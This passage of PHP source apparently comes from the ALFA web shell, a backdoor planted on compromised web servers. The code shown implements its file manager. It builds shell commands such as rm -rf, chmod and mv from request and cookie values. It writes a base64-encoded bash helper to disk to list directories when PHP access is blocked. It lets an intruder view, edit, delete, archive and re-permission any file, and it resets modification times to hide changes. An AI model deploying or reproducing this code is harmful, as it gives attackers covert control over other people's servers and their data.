2670alfaEx("rm -rf '".addslashes($f)."'",false,false);
2671if(@is_dir($f))
2672deleteDir($f);
2673else
2674@unlink($f);
2675}
2676}
2677if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
2678deleteDir(rawurldecode(@$_POST['alfa2']));
2679alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
2680}else{
2681@unlink(rawurldecode(@$_POST['alfa2']));
2682}
2683if($GLOBALS["glob_chdir_false"]){
2684 $source = rawurldecode(@$_POST['alfa2']);
2685 if($source!='..'&&!empty($source)){
2686 if(_alfa_can_runCommand(true,true)){
2687 alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
2688 }
2689 }
2690}
2691if(is_array($_POST['f']))
2692return;
2693break;
2694case 'paste':
2695if($_COOKIE['alfa_act'] == 'copy'&&isset($_COOKIE['alfa_f'])){
2696foreach($_COOKIE['alfa_f'] as $f)
2697copy_paste($_COOKIE['alfa_c'],$f, $GLOBALS['cwd']);
2698}elseif($_COOKIE['alfa_act'] == 'move'&&isset($_COOKIE['alfa_f'])){
2699function move_paste($c,$s,$d){
2700if(@is_dir($c.$s)){
2701@mkdir($d.$s);
2702$h = @opendir($c.$s);
2703while (($f = @readdir($h)) !== false)
2704if(($f != ".") and ($f != ".."))
2705copy_paste($c.$s.'/',$f, $d.$s.'/');
2706}elseif(@is_file($c.$s))
2707@copy($c.$s, $d.$s);
2708}
2709foreach($_COOKIE['alfa_f'] as $f)
2710@rename($_COOKIE['alfa_c'].$f, $GLOBALS['cwd'].$f);
2711}elseif($_COOKIE['alfa_act'] == 'zip'&&isset($_COOKIE['alfa_f'])){
2712if(class_exists('ZipArchive')){
2713$zip = new ZipArchive();
2714$zipX = "alfa_".rand(1,1000).".zip";
2715if($zip->open($zipX, 1)){
2716@chdir($_COOKIE['alfa_c']);
2717foreach($_COOKIE['alfa_f'] as $f){
2718if($f == '..')continue;
2719if(@is_file($_COOKIE['alfa_c'].$f))
2720$zip->addFile($_COOKIE['alfa_c'].$f, $f);
2721elseif(@is_dir($_COOKIE['alfa_c'].$f)){
2722$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
2723foreach($iterator as $key=>$value){
2724$key = str_replace('\\','/',realpath($key));
2725if(@is_dir($key)){
2726if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
2727}else{$zip->addFile($key,$key);}}}}
2728@chdir($GLOBALS['cwd']);
2729$zip->close();
2730__alert('>> '.$zipX.' << is created...');}}
2731}elseif($_COOKIE['alfa_act'] == 'unzip'&&isset($_COOKIE['alfa_f'])){
2732if(class_exists('ZipArchive')){
2733$zip = new ZipArchive();
2734foreach($_COOKIE['alfa_f'] as $f) {
2735if($zip->open($_COOKIE['alfa_c'].$f)){
2736$zip->extractTo($_COOKIE['alfa_cwd']);
2737$zip->close();}}}}
2738unset($_COOKIE['alfa_f']);
2739break;
2740default:
2741if(!empty($_POST['alfa1'])){
2742if(in_array($_POST['alfa1'], array("copy", "move", "zip", "unzip"))){
2743__alfa_set_cookie('alfa_act', @$_POST['alfa1']);
2744__alfa_set_cookie('alfa_f', @serialize($_POST['f']));
2745__alfa_set_cookie('alfa_c', @$_POST['c']);
2746return;
2747}
2748}
2749break;
2750}
2751}
2752$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
2753if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
2754 $path = explode('/', $res[1]);
2755 array_pop($path);
2756 $_POST['c'] = implode('/', $path);
2757}
2758$cmd_dir = false;
2759if($dirContent === false){
2760 if(_alfa_can_runCommand(true,true)){
2761 $tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"];
2762 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
2763 if(!isset($_COOKIE["alfachdir_bash"])||@!file_exists($tmp_getdir_path."/alfacgiapi/getdir.alfa")){
2764 $bash = "jZTfb5swEMef4a+4uaYkSmmS/YpEwsOkqVNfO+1hSqKKggnWwI4MEaFppL3vv9xfUtsYSKpMWh6I7/O9O9vcHVfvxrtCjJ8oGxep/fX+IcBT+/7ue4DdFXNtEqUc0BLZCRdAgTLAg6wALwQsfYdziLkN8rcNyzRAio0xRRrRBJZLwBSCANDtLYLra/D2Mr5KaZSCIGGcUfZrCOv1HMqUMB3VJcOD1gO8BLBiw86DBhpoO6G2RVnCZURRhiV4ESDnznd++M433yl856c/cULf+YLaLJa6n+u7+gzgCXWdUIiwhsViAQirbMi2ynpLAnzQynKyPurdeMWI6OjU0I3gu21H30tqFfS5j/6gSM5jmtQd+2hit0TkbJd3/NMJT3d5yDrls1EYqR571XWb1yALNBgApcFkLp8LfLjqfI6KjEYw7Av2JstIFu/QWT6m1J8e//7+05Qy5oy8PdNZuKxAU21zGV3zyXQ2m6G+vJbVXhVNlGJAkw/FQm5X7eVDVPKxF5V00LXVmb1KFkaVTyVUraSYOGFnm0Q84yJAeUjZ40YQwvRRZUKSmXT/FSo7tSR9aEEu+AgStx79abHqHf0SYipIVHJRn22kW0tpJ0fqYwTZ7LJQyM7OiL7uy8tlB5Jvy/rfbkWdP/GMRqCm6ML+OrA5tp7zwwqxMCcr5MNKTsEK3ch/5WpIs1RQT4GhZq2wHgODzVphNQqGNksFm2kwuDWUYJrEKJ3VSrpdTkRjt7IuzYls7OONrZu4+Z4djmv0Cg==";
2765 $tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa",$bash);
2766 __alfa_set_cookie("alfachdir_bash", "true");
2767 __alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path);
2768 }
2769 $dirContent = alfaEx("cd ".$tmp_getdir_path."/alfacgiapi;sh getdir.alfa '".addslashes(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd'])."'");
2770 $dirContent = json_decode($dirContent, true);
2771 if(is_array($dirContent)){
2772 array_pop($dirContent);
2773 $cmd_dir = true;
2774 }else{
2775 $dirContent = false;
2776 }
2777 }
2778}
2779alfahead();
2780AlfaNum(8,9,10,7,6,5,4);
2781$count_dirContent = @count($dirContent);
2782if($count_dirContent > 300){
2783 @$_COOKIE["alfa_limited_files"] = 100;
2784}
2785$alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : 'name';
2786$alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int)$_COOKIE["alfa_limited_files"] : 0;
2787$alfa_files_page_number = isset($_POST["pagenum"]) ? (int)$_POST["pagenum"] : 1;
2788$alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : 'asc';
2789$files_page_count = 1;
2790if($alfa_limited_files > 0){
2791 $files_page_count = ceil($count_dirContent/$alfa_limited_files);
2792 if($files_page_count > 1){
2793 $files_page_count++;
2794 }
2795}
2796echo '<div><div class="filters-holder"><span>Filter: </span><input style="color:#25ff00;" autocomplete="off" type="text" id="regex-filter" name="name-filter" onkeydown="doFilterName(this);"><span style="margin-left:10px">Sort By: </span><select name="sort_files" onchange="sortBySelectedValue(this,\'alfa_sort_by\');" style="color:#25ff00;"><option value="name" '.($alfa_sort_by == 'name'?'selected':'').'>Name</option><option value="size" '.($alfa_sort_by == 'size'?'selected':'').'>Size</option><option value="modify" '.($alfa_sort_by == 'modify'?'selected':'').'>Modify</option></select><span style="margin-left:10px">Direction: </span><select name="direction_filesman" onChange="sortBySelectedValue(this,\'alfa_filesman_direction\')" style="color:#25ff00;"><option value="asc" '.($alfa_filesman_direction == 'asc'?'selected':'').'>Ascending</option><option value="desc" '.($alfa_filesman_direction == 'desc'?'selected':'').'>Descending</option></select><span style="margin-left:10px;"> limit: </span><input style="text-align:center;width: 40px;color:#25ff00;" type="text" name="limited_number" value="'.$alfa_limited_files.'" oninput="this.value=this.value.replace(/[^0-9]/g,\'\');setCookie(\'alfa_limited_files\', this.value, 2012);"><span style="margin-left:10px;">Files Count: <b style="color:#25ff00;">'.($count_dirContent-1).'</b></span></div><div class="header">';
2797if($dirContent == false){
2798echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
2799alfaFooter();
2800return;
2801}
2802global $sort;
2803$sort = array('name', 1);
2804if(isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])){
2805 $sort[0] = $_COOKIE["alfa_sort_by"];
2806}
2807if(!empty($_POST['alfa1'])) {
2808if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
2809$sort = array($match[1], (int)$match[2]);
2810}
2811if($alfa_files_page_number > ($files_page_count-1)){
2812 $alfa_files_page_number = 1;
2813}
2814$checkbox_rand = rand(11111, 99999);
2815echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table id='filemanager_table' width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk".$checkbox_rand."' onclick='checkBox(this);' class='chkbx'><label for='mchk".$checkbox_rand."'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
2816$dirs = $files = array();
2817$n = $count_dirContent;
2818if($n > $alfa_limited_files && $alfa_limited_files > 0){
2819 $n = ($alfa_limited_files * $alfa_files_page_number);
2820 if($n > $count_dirContent){
2821 $n = $count_dirContent;
2822 }
2823}
2824$i = 0;
2825if($alfa_limited_files > 0 && $alfa_files_page_number > 1){
2826 $i = $alfa_limited_files * ($alfa_files_page_number - 1);
2827}
2828$page_builder = get_pagination_links($alfa_files_page_number,$files_page_count -1);
2829$cmd_dir_backp = "";
2830for(;$i<$n;$i++){
2831if($cmd_dir){
2832$filename = $dirContent[$i]["name"];
2833$file_owner = $dirContent[$i]["owner"];
2834$file_group = $dirContent[$i]["group"];
2835$file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
2836$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);
2837$file_size = $dirContent[$i]["size"];
2838if(substr($dirContent[$i]["name"], 0 ,1) == "/"){
2839$file_path = $dirContent[$i]["name"];
2840$dirContent[$i]["name"] = "..";
2841$filename = $dirContent[$i]["name"];
2842}else{
2843$file_path = $GLOBALS['cwd']."/".$dirContent[$i]["name"];
2844}
2845}else{
2846$filename = $dirContent[$i];
2847$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");
2848$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");
2849$file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");
2850$file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");
2851$file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
2852$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
2853$file_size = @filesize($GLOBALS['cwd'].$filename);
2854$file_path = $GLOBALS['cwd'].$filename;
2855}
2856$tmp = array('name' => $filename,
2857'path' => $file_path,
2858'modify' => $file_modify,
2859'perms' => $file_perm,
2860'size' => $file_size,
2861'owner' => $file_owner,
2862'group' => $file_group
2863);
2864if($filename == ".." && !$cmd_dir){
2865 $tmp["path"] = str_replace("\\", "/", realpath($file_path));
2866}
2867if(!$cmd_dir){
2868if(@is_file($file_path)){
2869$arr_mrg = array('type' => 'file');
2870if(@is_link($file_path)){
2871$arr_mrg["link"] = readlink($tmp['path']);
2872}
2873$files[] = array_merge($tmp, $arr_mrg);
2874}elseif(@is_link($file_path)){
2875$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
2876}elseif(@is_dir($file_path)&& ($filename != ".")){
2877$dirs[] = array_merge($tmp, array('type' => 'dir'));
2878}
2879}else{
2880 if($dirContent[$i]["type"]=="file"){
2881 $files[] = array_merge($tmp, array('type' => 'file'));
2882 }else{
2883 if($dirContent[$i]["name"] != "."){
2884 $dirs[] = array_merge($tmp, array('type' => 'dir'));
2885 }
2886 }
2887}
2888}
2889$GLOBALS['sort'] = $sort;
2890function alfaCmp($a, $b) {
2891if($GLOBALS['sort'][0] != 'size')
2892return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
2893else
2894return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
2895}
2896usort($files, "alfaCmp");
2897usort($dirs, "alfaCmp");
2898if(isset($_COOKIE["alfa_filesman_direction"])&& !empty($_COOKIE["alfa_filesman_direction"])){
2899 if($_COOKIE["alfa_filesman_direction"] == 'desc'){
2900 $files = array_reverse($files);
2901 $dirs = array_reverse($dirs);
2902 }
2903}
2904$files = array_merge($dirs, $files);
2905$l=0;
2906$cc=0;
2907foreach($files as $f){
2908$f['name'] = htmlspecialchars($f['name']);
2909$newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];
2910$checkbox = 'checkbox_'.$checkbox_rand.$cc;
2911$raw_name = rawurlencode($f['name']);
2912$icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
2913$style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';
2914echo '<tr class="fmanager-row" id="tr_row_'.$cc.'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td id="td_row_'.$cc.'">'.$icon.'<div style="'.$style.'"><a row="'.$cc.'" id="id_'.$cc.'" class="main_name" onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');" href="#action=fileman&path='.$GLOBALS['cwd'].'&file='.$raw_name.'" fname="'.$raw_name.'" ftype="file" path="'.$GLOBALS['cwd'].'" opt_title="'.$f['link'].'" '.(isset($f['link'])?'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"':'').'>'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" href="#action=fileman&path='.$f['path'].'" fname="'.$raw_name.'" ftype="folder" path="'.$GLOBALS['cwd'].'" opt_title="'.$f['link'].'" '.(isset($f['link'])?'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"':'').'><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?(isset($f['link'])?'[L] ':'').alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a id="id_chmode_'.$cc.'" href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.
2915$f['perms'].'</td><td><a id="id_rename_'.$cc.'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a id="id_touch_'.$cc.'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a id="id_edit_'.$cc.'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a id="id_download_'.$cc.'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a id="id_delete_'.$cc.'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';
2916$l = $l?0:1;
2917$cc++;
2918}
2919echo "<tr id='filemanager_last_tr'><td colspan=7>
2920<input type=hidden name=a value='FilesMan'>
2921<input type=hidden name=c value='".htmlspecialchars(($GLOBALS['glob_chdir_false']?$_POST['c']:$GLOBALS['cwd']))."'>
2922<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
2923<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
2924<input type='submit' value=' '>
2925</form></table><div class='pages-holder'><div class='pages-number'>".$page_builder."</div></div></div></div>";
2926alfafooter();
2927}
2928function get_pagination_links($current_page, $total_pages){
2929 $links = "";
2930 if ($total_pages >= 1 && $current_page <= $total_pages) {
2931 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\"><<</a>";
2932 $selected_page = "";
2933 if($current_page == 1){
2934 $selected_page = " active-page-number";
2935 }
2936 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">1</a>";
2937 $i = max(2, $current_page - 5);
2938 if ($i > 2)
2939 $links .= "<a class=\"page-number\">...</a>";
2940 for (; $i < min($current_page + 6, $total_pages); $i++) {
2941 if($i == $current_page){
2942 $selected_page = " active-page-number";
2943 }else{
2944 $selected_page = "";
2945 }
2946 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">{$i}</a>";
2947 }
2948 if ($i != $total_pages)
2949 $links .= "<a class=\"page-number\">...</a>";
2950 $selected_page = " last-page-number";
2951 if($current_page == $total_pages){
2952 $selected_page .= " active-page-number";
2953 }
2954 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">{$total_pages}</a>";
2955 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\">>></a>";
2956 }
2957 return $links;
2958}
2959function alfaFilesTools(){
2960alfahead();
2961echo '<div class="filestools" style="height: 100%;">';
2962if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
2963$alfa1_decoded = $_POST['alfa1'];
2964$chdir_fals = false;
2965if(!@chdir($_POST['c'])){
2966 $chdir_fals = true;
2967 $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
2968 $alfa_canruncmd = _alfa_can_runCommand(true,true);
2969 if($alfa_canruncmd){
2970 $slashed_alfa1 = addslashes($_POST['alfa1']);
2971 $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
2972 $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
2973 }
2974}
2975if($_POST['alfa2'] == 'auto'){
2976if(is_array(@getimagesize($_POST['alfa1']))){
2977$_POST['alfa2'] = 'image';
2978}else{
2979 $_POST['alfa2'] = 'view';
2980 if($chdir_fals){
2981 if($alfa_canruncmd){
2982 $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
2983 $mimetype = $mime[1];
2984 if(!empty($mimetype)){
2985 if(strstr($mimetype, "image")){
2986 $_POST['alfa2'] = 'image';
2987 }
2988 }
2989 }
2990 }
2991}
2992}
2993if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
2994if(@$_POST['alfa2'] == 'mkfile'){
2995$_POST['alfa1'] = trim($_POST['alfa1']);
2996if($chdir_fals&&$alfa_canruncmd){
2997 if(_alfa_is_writable($_POST["c"])){
2998 alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
2999 $_POST['alfa2'] = "edit";
3000 }
3001}
3002if(!@file_exists($_POST['alfa1'])){
3003$fp = @fopen($_POST['alfa1'], 'w');
3004if($fp){
3005$_POST['alfa2'] = "edit";
3006fclose($fp);
3007}
3008}else{
3009$_POST['alfa2'] = "edit";
3010}
3011}
3012if(!_alfa_file_exists(@$_POST['alfa1'])){
3013echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";
3014alfaFooter();
3015return;
3016}
3017if($chdir_fals){
3018$filesize = $file_info[3];
3019$uid["name"] = $file_info[1];
3020$gid["name"] = $file_info[2];
3021$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);
3022}else{
3023$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
3024$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
3025if(!$uid&&!$gid){
3026$uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
3027$gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
3028}
3029$permcolor = alfaPermsColor($_POST['alfa1']);
3030$filesize = @filesize($_POST['alfa1']);
3031if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
3032 if(_alfa_can_runCommand()){
3033 list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
3034 }
3035}
3036}
3037if(substr($_POST['alfa1'], 0, 7) == "phar://"){
3038 $alfa_file_directory = $_POST['alfa1'];
3039}else{
3040 $alfa_file_directory = str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']);
3041}
3042echo '<div style="overflow: hidden;white-space: nowrap;text-overflow: ellipsis;"><span class="editor_file_info_vars">Name:</span> '.htmlspecialchars(basename($alfa1_decoded)).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.dirname($alfa_file_directory).'</div>';
3043if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
3044if(!_alfa_is_dir($_POST['alfa1'])){
3045$m = array('View', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
3046$ftype = "file";
3047}else{
3048$m = array('Chmod', 'Rename', 'Touch');
3049$ftype = "dir";
3050}
3051echo('<div>');
3052foreach($m as $v)
3053echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';
3054echo '</div>';
3055switch($_POST['alfa2']){
3056case 'view':case 'edit':
3057@chdir($_POST['c']);
3058$disabled_btn = "";
3059if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
3060$disabled_btn = "disabled=disabled";
3061$disabled_btn_style= 'background: #ff0000;color: #fff;';
3062}
3063if(!empty($_POST['alfa3'])){
3064$_POST['alfa3'] = substr($_POST['alfa3'],1);
3065$time = @filemtime($_POST['alfa1']);
3066$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
3067if($chdir_fals&&$alfa_canruncmd){
3068 $rname = $alfa1_decoded;
3069 $randname = $rname.rand(111,9999);
3070 $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
3071 if($fp = @__write_file($filepath ,$_POST['alfa3'])){
3072 alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
3073 }
3074}
3075if($fp){
3076echo 'Saved!<br>';
3077@touch($_POST['alfa1'],$time,$time);
3078}
3079}
3080echo '<div class="editor-view"><div class="view-content editor-ace-controller"><div style="display:inline-block;">'._alfa_load_ace_options("editor").'<button style="border-radius:10px;" class="button ace-controler" onClick="copyToClipboard(this);">Copy</button> <button class="button ace-controler" onclick="alfaAceToFullscreen(this);">Full Screen</button> <button onclick="var ace_val = alfa_ace_editors.editor[this.getAttribute(\'ace_id\')].getValue();editor(\''.addslashes($alfa1_decoded).'\',\'edit\',\'1\'+ace_val,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;" class="button ace-controler ace-save-btn" style="width: 100px;height: 33px;'.$disabled_btn_style.'" '.$disabled_btn.'>save</button></div><pre class="ml1 view_ml_content">';
3081echo htmlspecialchars(__read_file($_POST['alfa1']));
3082echo '</pre></div></div>';
3083break;
3084case 'highlight':
3085@chdir($_POST['c']);
3086if(@is_readable($_POST['alfa1'])){
3087echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
3088$code = @highlight_file($_POST['alfa1'],true);
3089echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';
3090}
3091break;
3092case 'delete':
3093@chdir($_POST['c']);
3094if(@is_writable($_POST['alfa1'])||$GLOBALS["glob_chdir_false"]){
3095$deleted = true;
3096if(!@unlink($_POST['alfa1'])){
3097 $deleted = false;
3098 if($alfa_canruncmd){
3099 if(_alfa_is_writable($_POST['alfa1'])){
3100 alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
3101 $deleted = true;
3102 }
3103 }
3104}
3105if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}
3106break;
3107case 'chmod':
3108@chdir($_POST['c']);
3109if(!empty($_POST['alfa3'])){
3110$perms = 0;
3111for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
3112$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
3113if(!@chmod($_POST['alfa1'], $perms)){
3114if($chdir_fals&&$alfa_canruncmd){
3115alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
3116echo('Success!');
3117}else{
3118echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}
3119}else{echo('Success!');}
3120}
3121clearstatcache();
3122AlfaNum(8,9,10,7,6,5,4,2,1);
3123if($chdir_fals){
3124 $file_perm = $file_info[5];
3125}else{
3126 $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);
3127}
3128echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';
3129break;
3130case 'hexdump':
3131@chdir($_POST['c']);
3132$c = __read_file($_POST['alfa1']);
3133$n = 0;
3134$h = array('00000000<br>','','');
3135$len = strlen($c);
3136for ($i=0; $i<$len; ++$i) {
3137$h[1] .= sprintf('%02X',ord($c[$i])).' ';
3138switch ( ord($c[$i]) ) {
3139case 0: $h[2] .= ' '; break;
3140case 9: $h[2] .= ' '; break;
3141case 10: $h[2] .= ' '; break;
3142case 13: $h[2] .= ' '; break;
3143default: $h[2] .= $c[$i]; break;
3144}
3145$n++;
3146if ($n == 32) {
3147$n = 0;
3148if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
3149$h[1] .= '<br>';
3150$h[2] .= "\n";
3151}
3152}
3153echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';
3154break;
3155case 'rename':
3156@chdir($_POST['c']);
3157$alfa1_escape = addslashes($_POST["alfa1"]);
3158$alfa3_escape = addslashes($_POST["alfa3"]);
3159if(!empty($_POST['alfa3'])){
3160$cmd_rename = false;
3161if($chdir_fals&&$alfa_canruncmd){
3162if(_alfa_is_writable($_POST['alfa1'])){
3163$alfa1_escape = addslashes($alfa1_decoded);
